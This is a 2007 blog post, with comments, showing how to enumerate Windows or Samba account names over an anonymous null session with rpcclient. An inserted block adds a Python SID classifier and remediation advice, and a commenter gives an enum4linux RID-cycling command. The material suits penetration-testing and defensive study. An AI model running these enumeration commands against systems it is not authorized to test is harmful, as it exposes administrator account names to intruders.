Wednesday, August 29, 2007

More of using rpcclient to find usernames


So say you are given the assignment of doing an audit in a non-English speaking country. At a minimum you are going to have to find out how they spell "administrator" in the country in question. If Google doesn't help you, or gives you multiple options (like it did me this time), and you can find a box running Samba or with file and printer sharing enabled and shared to the world (like you aren't supposed to do), then you can use rpcclient to pull out the usernames over a null session.

null sessions still rule in 2007...

cg@segfault:~$ rpcclient -U "" x.x.3.96
Password:
rpcclient $> lsaenumsid
found 11 SIDs
S-1-5-6
S-1-5-32-551
S-1-5-32-547
S-1-5-32-545
S-1-5-32-544
S-1-5-21-2000478354-1708537768-1957994488-501 <--guest
S-1-5-21-2000478354-1708537768-1957994488-500 <--administrator
S-1-5-21-2000478354-1708537768-1957994488-1002
S-1-5-21-2000478354-1708537768-1957994488-1001
S-1-5-21-2000478354-1708537768-1957994488-1000
S-1-1-0
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-501
S-1-5-21-2000478354-1708537768-1957994488-501 NSL09\Convidado (1)
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-500
S-1-5-21-2000478354-1708537768-1957994488-500 NSL09\Administrador (1)
rpcclient $> lookupnames Administrador
Administrador S-1-5-21-2000478354-1708537768-1957994488-500 (User: 1)
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-502
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-503
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-503
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-504
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-505
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-506
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-1000
S-1-5-21-2000478354-1708537768-1957994488-1000 NSL09\TsInternetUser (1)
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-1001
S-1-5-21-2000478354-1708537768-1957994488-1001 NSL09\IUSR_NSL09 (1)
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-1002
S-1-5-21-2000478354-1708537768-1957994488-1002 NSL09\IWAM_NSL09 (1)
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-1003
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-1004
result was NT_STATUS_NONE_MAPPED
rpcclient $> exit


There you have it:

rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-500
S-1-5-21-2000478354-1708537768-1957994488-500 NSL09\Administrador (1)

oh and thanks for the name of the box too :-)
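The point of the session above is that the RID, not the (localized or renamed) name, tells you what an account is: -500 is always the built-in administrator and -501 always the guest, and RIDs from 1000 up are accounts someone created. Below is an added helper, not from the original post, that reads lsaenumsid output like the one above and labels each SID that way for an audit report; the well-known SID and RID tables are the documented Windows values, and the sample output is the post's own listing embedded so it runs offline.

```python
import re

# Fixed well-known SIDs (documented Windows values, not taken from the post).
WELL_KNOWN_SIDS = {
    "S-1-1-0": "Everyone",
    "S-1-5-6": "Service",
    "S-1-5-32-544": "BUILTIN\\Administrators",
    "S-1-5-32-545": "BUILTIN\\Users",
    "S-1-5-32-547": "BUILTIN\\Power Users",
    "S-1-5-32-551": "BUILTIN\\Backup Operators",
}
# RIDs under a machine/domain SID (S-1-5-21-...) that keep their meaning no matter
# what the account was renamed or localized to.
WELL_KNOWN_RIDS = {500: "Administrator", 501: "Guest", 502: "krbtgt"}

SID_RE = re.compile(r"^S-1-\d+(?:-\d+)+$")
DOMAIN_RE = re.compile(r"^(S-1-5-21-\d+-\d+-\d+)-(\d+)$")

def classify_sid(sid):
    """Return (domain_sid, rid, label); domain_sid/rid are None for non-domain SIDs."""
    if sid in WELL_KNOWN_SIDS:
        return None, None, WELL_KNOWN_SIDS[sid]
    m = DOMAIN_RE.match(sid)
    if m:
        domain, rid = m.group(1), int(m.group(2))
        if rid in WELL_KNOWN_RIDS:
            return domain, rid, WELL_KNOWN_RIDS[rid] + " (fixed RID)"
        if rid >= 1000:
            return domain, rid, "user-created account or group"
        return domain, rid, "other built-in RID"
    if SID_RE.match(sid):
        return None, None, "unclassified SID"
    raise ValueError("not a SID: %r" % sid)

def summarize(lsaenumsid_output):
    """Group the SIDs in lsaenumsid output by machine/domain SID and label each RID."""
    report = {"well_known": {}, "domains": {}}
    for line in lsaenumsid_output.splitlines():
        line = line.strip()
        if not line.startswith("S-"):
            continue  # skips the 'found N SIDs' line and blanks
        domain, rid, label = classify_sid(line)
        if domain is None:
            report["well_known"][line] = label
        else:
            report["domains"].setdefault(domain, {})[rid] = label
    return report

# Sample input: the lsaenumsid listing from the post, embedded here.
SAMPLE_OUTPUT = "found 11 SIDs\nS-1-5-6\nS-1-5-32-551\nS-1-5-32-547\nS-1-5-32-545\n" \
    "S-1-5-32-544\nS-1-5-21-2000478354-1708537768-1957994488-501\n" \
    "S-1-5-21-2000478354-1708537768-1957994488-500\nS-1-5-21-2000478354-1708537768-1957994488-1002\n" \
    "S-1-5-21-2000478354-1708537768-1957994488-1001\nS-1-5-21-2000478354-1708537768-1957994488-1000\nS-1-1-0\n"
```

The fix on the target side is the one the post hints at: don't expose SMB to the world, and don't allow anonymous (null session) SID and name lookups, since the RID-to-name mapping gives away the localized administrator name whatever it was renamed to.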


fun rpcclient info: http://uw714doc.sco.com/en/samba/rpcclient.1.html

-CG

2 comments:

Anonymous said...

Below is a tool that uses this very technique to perform RID-Cycling against Windows / Samba systems:

http://www.portcullis-security.com/tools/free/enum4linux-0.7.0.tar.gz

The command line you'd use is something like:

$ enum4linux.pl -R 500-550,1000-1050 10.0.0.1

CG said...

excellent!
thank you anonymous good poster :-)